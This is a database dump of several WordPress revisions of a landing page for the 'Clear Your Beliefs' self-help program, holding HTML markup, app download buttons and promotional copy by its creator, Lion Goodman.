(1601, 2, '2014-10-23 23:53:02', '2014-10-24 04:53:02', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center;margin-top:50px;margin-bottom:0px">\nDownload the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.\n</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 87px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 23:53:02', '2014-10-24 04:53:02', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1603, 2, '2014-10-23 23:56:30', '2014-10-24 04:56:30', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center;margin-top:50px;margin-bottom:0px">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#"><img class="aligncenter size-full wp-image-1483" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_07.png" alt="btn_07" width="225" height="57" /></a><a href="#"><img class="aligncenter size-full wp-image-1484" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/btn_09.png" alt="btn_09" width="225" height="59" /></a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 87px;"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-23 23:56:30', '2014-10-24 04:56:30', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1604, 2, '2014-10-24 00:11:57', '2014-10-24 05:11:57', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 94px"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now!\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n\nComplete Program\n<p style="text-align: center"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center;margin-bottom: -5px;margin-top: 87px"><strong><a href="#"><img class="aligncenter size-full wp-image-1485" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/learn-more.png" alt="btn_10" width="225" height="60" /></a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 00:11:57', '2014-10-24 05:11:57', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1605, 2, '2014-10-24 00:15:01', '2014-10-24 05:15:01', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n\nComplete Program\n<p style="text-align: center"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center;margin-bottom: -5px;margin-top: 87px"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 00:15:01', '2014-10-24 05:15:01', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1608, 2, '2014-10-24 00:30:26', '2014-10-24 05:30:26', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n\nComplete Program\n\n<p style="text-align: center"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center;margin-bottom: -5px;margin-top: 70px"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 00:30:26', '2014-10-24 05:30:26', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1606, 2, '2014-10-24 00:21:54', '2014-10-24 05:21:54', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 94px;"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center; font-size: 14px; margin-bottom: 46px;">Start Clearing Whatever Is In The Way Right Now!\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 87px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 00:21:54', '2014-10-24 05:21:54', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1607, 2, '2014-10-24 00:27:55', '2014-10-24 05:27:55', '<img class="size-full wp-image-1457 aligncenter" style="margin-left: 75px !important; width: 1035px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" width="961" height="232" />\n\nFree eBook\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="107" height="159" />\n\n<p style="text-align: center; margin-top:50px; margin-bottom:0px;">Download the free eBook. Learn all about your limiting beliefs, and how you can delete them permanently.</p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/download.png" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 94px"><strong>DOWNLOAD the FREE APP</strong></p>\n\n<p style="text-align: center;font-size: 14px;margin-bottom: 46px">Start Clearing Whatever Is In The Way Right Now!</p>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPHONE APP</a>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> DOWNLOAD iPAD APP</a>\n\nComplete Program\n<p style="text-align: center;"><strong><em>\nCLEAR YOUR BELIEFS</em></strong>\n\n<p style="text-align: center;"> <strong>Clear Your Limiting and\nNegative Beliefs – Permanently!</strong>\n\n<p style="text-align: center;">Eliminate Beliefs that\nBlock Your Abundance,\nPrevent Your Full Expression,\nCause You to React Badly,\nand\nLimit Your True Magnificence\n\n<p style="text-align: center; margin-bottom: -5px; margin-top: 87px;"><strong>\n<a href="#" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> LEARN MORE</a> </strong></p>\n\nThe <em>Clear Your Beliefs</em> Program will help you:\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\nHow and Why It Works So Well\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<strong><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman, creator of the <em>Clear Your Beliefs</em> program.  </strong>\n\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false."  They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n- <em>What do I want to experience?\n- What belief is creating this experience I don''t want?\n- How can I change my beliefs so I can change my experience?\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-10-24 00:27:55', '2014-10-24 05:27:55', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
